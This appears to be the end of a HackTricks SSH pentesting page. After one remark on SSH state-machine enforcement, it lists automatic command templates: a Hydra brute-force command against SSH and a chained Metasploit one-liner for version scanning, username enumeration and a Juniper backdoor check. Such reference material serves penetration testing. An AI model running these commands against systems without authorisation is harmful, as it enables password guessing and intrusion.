The common lesson is that failing to enforce the RFC-defined state transitions can be catastrophic; when reviewing or fuzzing SSH daemons, pay special attention to state-machine enforcement.

References

HackTricks Automatic Commands

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Entry_2:
Name: console-less msf enumeration
Description: SSH enumeration without the need to run msfconsole interactively
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
